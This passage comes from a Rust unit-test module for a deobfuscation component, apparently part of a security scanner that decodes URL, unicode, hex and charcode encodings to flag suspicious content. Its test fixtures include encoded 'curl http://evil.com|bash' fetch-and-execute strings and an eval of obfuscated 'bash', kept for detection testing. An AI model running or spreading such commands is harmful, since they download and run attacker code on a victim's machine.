923            .any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
924        // Either finds decoded content or the original encoding pattern
925        assert!(has_decoded_finding || !findings.is_empty());
926    }
927
928    #[test]
929    fn test_url_decode_mixed_with_normal_chars() {
930        let deob = Deobfuscator::new();
931        // URL with mixed encoded and normal characters that decode to suspicious content
932        // %63%75%72%6c = "curl", mixed with normal "http"
933        let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
934        let results = deob.deobfuscate(content);
935        // Should decode the URL-encoded parts mixed with normal chars to suspicious content
936        // If not suspicious enough, the else branch is still exercised during decoding
937        let _ = results; // Test exercises the code path regardless of result
938    }
939
940    #[test]
941    fn test_unicode_escape_mixed_chars() {
942        let deob = Deobfuscator::new();
943        // Unicode escapes mixed with normal text - tests else branch (line 176-177)
944        let content = r"var x = '\u0063url \u0068ttp://evil.com'";
945        let results = deob.deobfuscate(content);
946        // May or may not match depending on pattern, but exercises the code path
947        assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
948    }
949
950    #[test]
951    fn test_decode_hex_invalid_format() {
952        let deob = Deobfuscator::new();
953        // Hex with invalid characters that won't parse as hex
954        let content = "\\x6Gurl \\x7Gttp"; // 'G' is not valid hex
955        let results = deob.deobfuscate(content);
956        // Should handle gracefully
957        assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
958    }
959
960    #[test]
961    fn test_charcode_partial_match() {
962        let deob = Deobfuscator::new();
963        // String.fromCharCode that decodes to suspicious content (bash execution)
964        // 98,97,115,104 = "bash"
965        let content = "eval(String.fromCharCode(98,97,115,104))";
966        let results = deob.deobfuscate(content);
967        // Should decode the charcode to "bash" which is suspicious
968        assert!(results.iter().any(|r| r.encoding == "charcode"));
969    }
970
971    #[test]
972    fn test_deobfuscator_default() {
973        // Explicitly test Default::default() implementation
974        let deob: Deobfuscator = Default::default();
975        assert!(!deob.is_suspicious("normal text"));
976        assert!(deob.is_suspicious("curl http://evil.com"));
977    }
978
979    #[test]
980    fn test_url_decode_mixed_with_plain_chars() {
981        let deob = Deobfuscator::new();
982        // URL encoded with some plain chars - tests the else branch at line 139-141
983        // "curlhttp" where 'c', 'u', 'r', 'l', 'h', 't', 't', 'p' are encoded but spaces are not
984        // Actually the pattern requires consecutive %XX sequences, so let's use a different approach
985        // "%63url%20%68ttp" won't match the pattern, so we use fully encoded suspicious content
986        let content = "%63%75%72%6c%20%68%74%74%70"; // fully encoded "curl http"
987        let results = deob.decode_url(content);
988        assert!(!results.is_empty());
989        assert_eq!(results[0].encoding, "url");
990    }
991
992    #[test]
993    fn test_decode_url_hello_world_not_suspicious() {
994        let deob = Deobfuscator::new();
995        // URL encoded but non-suspicious content
996        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; // "hello world"
997        let results = deob.decode_url(content);
998        // Should not return results since content is not suspicious
999        assert!(results.is_empty());
1000    }
1001}